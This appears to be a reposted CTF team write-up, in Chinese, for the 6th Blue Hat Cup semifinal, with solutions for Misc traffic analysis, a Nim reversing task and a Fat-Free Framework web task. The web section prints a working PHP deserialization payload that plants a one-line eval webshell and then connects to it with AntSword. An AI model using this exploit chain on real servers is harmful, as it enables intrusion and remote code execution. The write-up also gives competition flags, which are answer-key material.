[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)
生活随笔
收集整理的這篇文章主要介紹了
[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
第六屆”藍帽杯“全國大學生網絡安全技能大賽(半決賽)電子取證賽題
第六屆”藍帽杯“全國大學生網絡安全技能大賽(半決賽)其他賽題
【Misc】加密的通道
1、經過wireshark分析發現是蟻劍流量
2、在http請求中有哈希文本
3、嘗試幾輪后發現是加密的PHP,使用zym解密
參考文章:[Web逆向] PHP解密:zym加密 帶亂碼調試過程
exp.php
使用
php exp.php decode.phpdecode.php為需要解密的文件,得到rsa.php
4、賽后總結發現
貌似直接導出http也是可以的,然后把各個參數丟進去解密輸出后第一個參數base64解密后就是flagflag{844dfc86da23a4d5283907efaf9791ad}
【Reverse】babynim
1、在NimMainModule函數中
2、比對格式、判斷長度
3、取中間的36位出來
4、算法就是 flag*e==enc
e=560063927934284409650605943439557376388765529190415191934763442152260285492096 72868995436445345986471 m=517484091195714939273140476977992136412862788940498402288045942239883725017828 94889443165173295123444031074892600769905627166718788675801 print((m//e))flag{923973256239481267349126498121231231}
【Web】easyfatfree
1、掃描發現
2、.DS_Store
參考
我不會,所以并沒有什么用
3、下載源碼看看
4、代碼審計后發現lib文件夾有寫入權限,寫反序列化
<?phpnamespace DB;error_reporting(0);highlight_file(__FILE__);class Jig {constFORMAT_JSON=0,FORMAT_Serialized=1;protected $uuid, $dir, $format, $log, $data, $lazy;function __construct(){$this->lazy=true;$this->data=["/a.php"=>["<?php eval(\$_POST['1']);?>"]];$this->format=self::FORMAT_Serialized;$this->dir="lib";}}echo urlencode(serialize(new Jig())); ?>運行結果:
O%3A6%3A%22DB%5CJig%22%3A6%3A%7Bs%3A7%3A%22%00%2A%00uuid%22%3BN%3Bs%3A6%3A%22%00%2A%00dir%22%3Bs%3A3%3A%22lib%22%3Bs%3A9%3A%22%00%2A%00format%22%3Bi%3A1%3Bs%3A6%3A%22%00%2A%00log%22%3BN%3Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22%2Fa.php%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A26%3A%22%3C%3Fphp+eval%28%24_POST%5B%271%27%5D%29%3B%3F%3E%22%3B%7D%7Ds%3A7%3A%22%00%2A%00lazy%22%3Bb%3A1%3B%7D5、主頁payload提交,在lib文件夾下寫入一句話
http://xxx.xxx.xxx.xxx:xxxx/?payload=O%3A6%3A%22DB%5CJig%22%3A6%3A%7Bs%3A7%3A%22%00%2A%00uuid%22%3BN%3Bs%3A6%3A%22%00%2A%00dir%22%3Bs%3A3%3A%22lib%22%3Bs%3A9%3A%22%00%2A%00format%22%3Bi%3A1%3Bs%3A6%3A%22%00%2A%00log%22%3BN%3Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22%2Fa.php%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A26%3A%22%3C%3Fphp+eval%28%24_POST%5B%271%27%5D%29%3B%3F%3E%22%3B%7D%7Ds%3A7%3A%22%00%2A%00lazy%22%3Bb%3A1%3B%7D6、中國蟻劍連接后在根目錄下拿到flag
url:
http://xxx.xxx.xxx.xxx:xxxx/lib/a.php【Forensic】
別問,所有做出來的選擇題填空題都是我蒙的,以前沒接觸過
今后加強學習,下次藍帽再來了
總結
以上是生活随笔為你收集整理的[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 自定义小部件Widget的探讨
- 下一篇: 设计一个权限系统-RBAC